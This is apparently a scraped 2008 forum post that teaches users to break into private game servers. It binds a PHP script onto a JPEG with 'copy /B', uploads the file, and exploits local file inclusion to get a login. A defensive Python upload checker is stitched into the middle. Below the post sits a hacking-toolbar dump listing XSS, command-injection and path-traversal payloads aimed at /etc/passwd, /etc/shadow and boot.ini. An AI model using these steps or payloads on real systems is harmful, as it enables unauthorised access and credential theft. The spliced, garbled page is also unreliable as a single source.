Alright hello everyone and welcome to my little tutorial!
You may be like, "omg noob, he's epic failed once, here he goes again."
You can just press Alt+F4 now!
Today what we're going to be doing is finding a Local File Inclusion (LFI) flaw in a website. This once worked for toxic-wow, but no longer does. Don't ask me why, but it doesn't!
So we're going to start off by binding a new image file with our new .txt file that has been coded to exploit the server.
Now, before we have a new image, we need to customize this PHP script written and made by me.
Free File Hosting Made Simple - MediaFire
LFI.txt
Now edit the VALUEs so the first `login` REMAINS `login`, BUT "login" becomes whatever your login name is. Example: I'd put "wolfe".
Now, wherever your file is uploaded, you need to put as many ../ as there are /.
Example: if there's a link
http://examplesite.com/avatars/upload/coolimage.jpg
You would need 2 ../, so the config would look like:
include("../../stats/config.php");
OK, now that you have that file configured for you, we need to combine it with an image, any image. This is my favorite.
If you want to use this, do a Right Click > Save As Test.jpg.
Next we're going to use command prompt to binary bind two files together!
If you don't know how to get to command prompt, this tutorial is too hard for you and you should just leave now.
Next, open up where you have your files saved. They should both be saved in the same folder, just for easy access.
Mine is C:\LFI
So the command we want is:
Code: cd C:\LFI
After that press enter!
So now it should say
C:\LFI>(You can enter text here, omg so cool, eh !!!!)
The next command we want to do is:
Code: copy /B imagehere.jpg + phpcodehere.txt NewFileNamehere.jpg
The image MUST be first, otherwise it won't work!
Now it doesn't matter if you do .txt or .php, but I find .txt to work better and more compatible with more images.
So now you should see a new file, the one we just created: NewFileNameHere.jpg
TEST IT! Open it with Notepad and see if you can find our PHP script!
Now go upload it to a site and run it. If it works, you can now log in with the details you config'd up above. If it didn't, well, you can't!
So that's pretty much it. If you guys aren't sure how to set up your config or something, feel free to post here and I'll answer.
If I get POSITIVE comments on this, I might show you guys how to retrieve the SQL admin username and password for a Private Server, pretty much COMPLETE control!
Also, Free File Hosting Made Simple - MediaFire is where all the files that I used are stored, including the final result! Enjoy!
~Wolfe
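From the defender's side, the file this post builds (a JPEG with a PHP script appended by `copy /B`) is easy to spot at upload time: the script sits after the JPEG End-Of-Image marker and carries a PHP open tag. The check below is an added example, not part of the post or its files; the function names and the sample bytes are constructed here.

```python
"""Triage an uploaded 'image' for appended script content (JPEG/PHP polyglot)."""
import re

JPEG_SOI = b"\xff\xd8"   # Start-Of-Image marker every JPEG begins with
JPEG_EOI = b"\xff\xd9"   # End-Of-Image marker; nothing should follow it
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def inspect_upload(data: bytes) -> dict:
    """Return findings for a file claimed to be a JPEG.

    Flags three things: the JPEG magic is missing, bytes trail the last
    End-Of-Image marker (exactly what a binary concatenation produces),
    or a PHP open tag appears anywhere in the file.
    """
    findings = {
        "is_jpeg": data.startswith(JPEG_SOI),
        "trailing_bytes": 0,
        "php_tag": PHP_TAG.search(data) is not None,
    }
    eoi = data.rfind(JPEG_EOI)
    if eoi != -1:
        findings["trailing_bytes"] = len(data) - (eoi + len(JPEG_EOI))
    return findings


def is_safe_image(data: bytes) -> bool:
    """Accept only a real JPEG with no trailing data and no PHP tag."""
    f = inspect_upload(data)
    return f["is_jpeg"] and f["trailing_bytes"] == 0 and not f["php_tag"]


# Constructed sample inputs (not real files): a minimal JPEG-like byte
# string, and the same bytes with a script appended as copy /B would do.
CLEAN_JPEG = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 8 + JPEG_EOI
POLYGLOT = CLEAN_JPEG + b"<?php echo 'appended'; ?>"

if __name__ == "__main__":
    print("clean:", inspect_upload(CLEAN_JPEG), is_safe_image(CLEAN_JPEG))
    print("polyglot:", inspect_upload(POLYGLOT), is_safe_image(POLYGLOT))
```

Some cameras and editors legitimately leave a few trailing bytes, so treat `trailing_bytes` as a reason to re-encode the upload with an image library rather than as proof of malice; re-encoding discards anything after the image data either way.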
[URL]
http://www.mmowned.com/forums/emulator-server-exploits-bugs/164811-tutorial-getting-gm-most-private-servers.html
[Headers]
Server: LiteSpeed
X-Powered-By: PHP/5.2.6
Date: Wed, 10 Sep 2008 22:42:50 GMT Connection: Keep-Alive Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Content-length: 149109
Cookie: IDstack=%2C57342%2C%2C349757%2C; __utma=67421069.334934750.1231293359.1231536738.1231540886.13; __utmz=67421069.1231295481.1.2.utmccn=(organic)|utmcsr=google|utmctr=ascent+maki ng+a+admin+account+via+sql|utmcmd=organic; __qca=48aba167-91b44-a128e-21969; bblastvisit=1220993554; bblastactivity=0; PHPSESSID=bd1cf1607d33e6b2a440586c4a00cdca; __qcb=931531576; __utmc=67421069; __utmb=67421069
=> [COLOR=yellow ! important]Edit Cookie[/COLOR]
[RECON]
---Lookup---WebhostinfoDNSStuffRobtexDNSNetwork DNSRecordsDomainToolsSamSpadeHost2IPNetcraft WhatSiteNetcraft SiteReportNetwork TracertNetwork LookupNetwork WhoisBetterwhoisNetwork ExpressPortScan1PortScan2FlashPortScanMX ProfileMX LookupMX RecordsdirIndexingcache:link:site:emailfiledffile:xlsfile:xmlfile:docfile
ptfile:txtfile:rtffile:conffile:configfile:inifile:lstfile:zipfile:gzipfile:emlf ile
sfile:exefile:rpmfile:dbfile:mdbfile:logfile
asswdfile
wd [[COLOR=yellow ! important]Launch all[/COLOR]] [[COLOR=yellow ! important]Prepend Proxy[/COLOR]]
[BruteForce Scan]
-- Select ---Dic-SmallDic-ComprehensiveBigCatalaCommonEuskeraMediumPasslistSpanishSubdomainsUserlistWeak_p asswords_module_passlistWeak_passwords_module_userlistCommon_passNamesApacheCgiC gisColdfusionDominoFatwireFatwire_pagenamesFrontpageIisIplanetJrunNetwareOracle9 iSharepointSunasTestsTomcatVignetteWeblogicWebsphereo-iiso-cfmo-jsp [[COLOR=yellow ! important]Start[/COLOR]] [[COLOR=yellow ! important]View[/COLOR]]
Loading ...
Do other stuffs.
Seem slowly? As it doesn't do multi-requests,
it's likely that web server IDS may not detect scanning.
But it's for dictionary scanning only.
[Stat]
Total Form: 0
Total Link: 3
[Fuzz URL]
http://www.mmowned.com/forums/emulat...servers.html?=
Select Fuzz Type: Fuzz [default]BackupFilesHeaderCheckCSRFCS Framing [[COLOR=yellow ! important]Help[/COLOR]]
Fuzz Options Fuzz Db: -- Check --1) ---!><!--">xxx<P>yyy..2) "><script>"..3) <script>..</script>..4) <<script>..;//<<..5) <script>..</script>..6) '><script>..<..7) "><script>..;</script>..\";..;//..9) %3cscript%3e..;%3c/script%3e..10) %3cscript%3e..;%3c%2fscript%3e..11) %3Cscript%3E..;%3C/script%3E..12) <script>..;</sc..13) <script>..;<..14) <xss><script>alert('XSS')<..15) <IMG%20SRC='javascript:..16) <IMG SRC="javascript:alert('XSS'..17) <IMG SRC="javascript:alert('XSS'..1
<IMG SRC=javascript:alert('XSS')>..19) <IMG SRC=JaVaScRiPt:alert('XSS')>..20) <IMG SRC=javascript:alert("XSS&quo..21) <IMG SRC=`javascript:alert("'XSS'..22) <IMG """><SCRIPT>alert(..23) <IMG SRC=javascript:alert(String.fromCharCode(8..24) <IMG%20SRC='javasc ript:..25) <IMG SRC="jav ascript:alert('XSS'..26) <IMG SRC="jav	ascript:alert('..27) <IMG SRC="jav
ascript:alert('..2
<IMG SRC="jav
ascript:alert('..29) <IMG SRC=" javascript:alert(..30) <IMG DYNSRC="javascript:alert('XSS..31) <IMG LOWSRC="javascript:alert('XSS..32) <IMG%20SRC='%26%23x6a;avasc%26%23000010rip..33) <IMG SRC=java..34) <IMG SRC=ja..35) <IMG SRC=java&a..36) '%3CIFRAME%20SRC=javascript:alert(%2527XSS%25..37) %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A..3
';alert(String.fromCharCode(88,83,83))//\..39) '';!--"<XSS>=&{()}..40) A..41) TRUE..42) FALSE..43) 0..44) 00..45) 1..46) -1..47) 1.0..4
-1.0..49) 2..50) -2..51) -20..52) 65536..53) 268435455..54) -268435455..55) 2147483647..56) 0xfffffff..57) NULL..5
null..59) \0..60) \00..61) < script > < / script>..62) %0a..63) %00..64) +%00..65) \0..66) \0\0..67) \0\0\0..6
\00..69) \00\00..70) \00\00\00..71) $null..72) $NULL..73) `id`..74) `dir`..75) ;id;..76) ;read;..77) ;netstat -a;..7
\nnetstat -a%\n..79) \"blah..80) |id|..81) ";id"..82) id%00..83) id%00|..84) |id..85) |dir..86) |dir|..87) |ls..8
|ls -la..89) ;ls -la..90) ;dir..91) |/bin/ls -al..92) \n/bin/ls -al\n..93) ?x=..94) ?x="..95) ?x=|..96) ?x=>..97) /index.html|id|..9
/boot.ini..99) /etc/passwd..100) /etc/shadow..101) ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8...102) ../../../../../../../../../../../../etc/hosts%00..103) ../../../../../../../../../../../../etc/hosts..104) ../../boot.ini..105) /../../../../../../../../%2A..106) ../../../../../../../../../../../../etc/passwd%00..107) ../../../../../../../../../../../../etc/passwd..10
../../../../../../../../../../../../etc/shadow%00..109) ../../../../../../../../../../../../etc/shadow..110) /../../../../../../../../../../etc/passwd^^..111) /../../../../../../../../../../etc/shadow^^..112) /../../../../../../../../../../etc/passwd..113) /../../../../../../../../../../etc/shadow..114) /./././././././././././etc/passwd..115) /./././././././././././etc/shadow..116) \..\..\..\..\..\..\..\..\..\..\etc\pas..117) \..\..\..\..\..\..\..\..\..\..\etc\sha..11
..\..\..\..\..\..\..\..\..\..\etc\passw..119) ..\..\..\..\..\..\..\..\..\..\etc\shado..120) /..\../..\../..\../..\../..\../..\../etc/pas..121) /..\../..\../..\../..\../..\../..\../etc/sha..122) .\\./.\\./.\\./.\\./.\\./.\\./etc/pass..123) .\\./.\\./.\\./.\\./.\\./.\\./etc/shad..124) \..\..\..\..\..\..\..\..\..\..\etc\pas..125) \..\..\..\..\..\..\..\..\..\..\etc\sha..126) ..\..\..\..\..\..\..\..\..\..\etc\passw..127) ..\..\..\..\..\..\..\..\..\..\etc\shado..12
%0a/bin/cat%20/etc/passwd..129) %0a/bin/cat%20/etc/shadow..130) %00/etc/passwd%00..131) %00/etc/shadow%00..132) %00../../../../../../etc/passwd..133) %00../../../../../../etc/shadow..134) /../../../../../../../../../../../etc/passwd%00.jp..135) /../../../../../../../../../../../etc/passwd%00.ht..136) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..137) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..13
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..139) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..140) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..141) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..142) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..143) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..144) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..145) \\'/bin/cat%20/etc/passwd\\'..146) \\'/bin/cat%20/etc/shadow\\'..147) ../../../../../../../../conf/server.xml..14
/../../../../../../../../bin/id|..149) C:/inetpub/wwwroot/global.asa..150) C:\inetpub\wwwroot\global.asa..151) C:/boot.ini..152) C:\boot.ini..153) ../../../../../../../../../../../../localstart.asp..154) ../../../../../../../../../../../../localstart.asp..155) ../../../../../../../../../../../../boot.ini%00..156) ../../../../../../../../../../../../boot.ini..157) /./././././././././././boot.ini..15
/../../../../../../../../../../../boot.ini%00..159) /../../../../../../../../../../../boot.ini..160) /..\../..\../..\../..\../..\../..\../boot.in..161) /.\\./.\\./.\\./.\\./.\\./.\\./boot.in..162) \..\..\..\..\..\..\..\..\..\..\boot.ini..163) ..\..\..\..\..\..\..\..\..\..\boot.ini%0..164) ..\..\..\..\..\..\..\..\..\..\boot.ini..165) /../../../../../../../../../../../boot.ini%00.html..166) /../../../../../../../../../../../boot.ini%00.jpg..167) /.../.../.../.../.../..16
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%..169) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..170) %0d%0aX-Injection-Header:%20AttackValue..171) !@#0%^#0##018387@#0^^**(()..172) %01%02%03%04%0a%0d%0aADSF..173) /,%ENV,/..174) <!--#exec%20cmd="/bin/cat%20/etc/p..175) <!--#exec%20cmd="/bin/cat%20/etc/s..176) %..177) #..17
*..179) }..180) ;..181) /..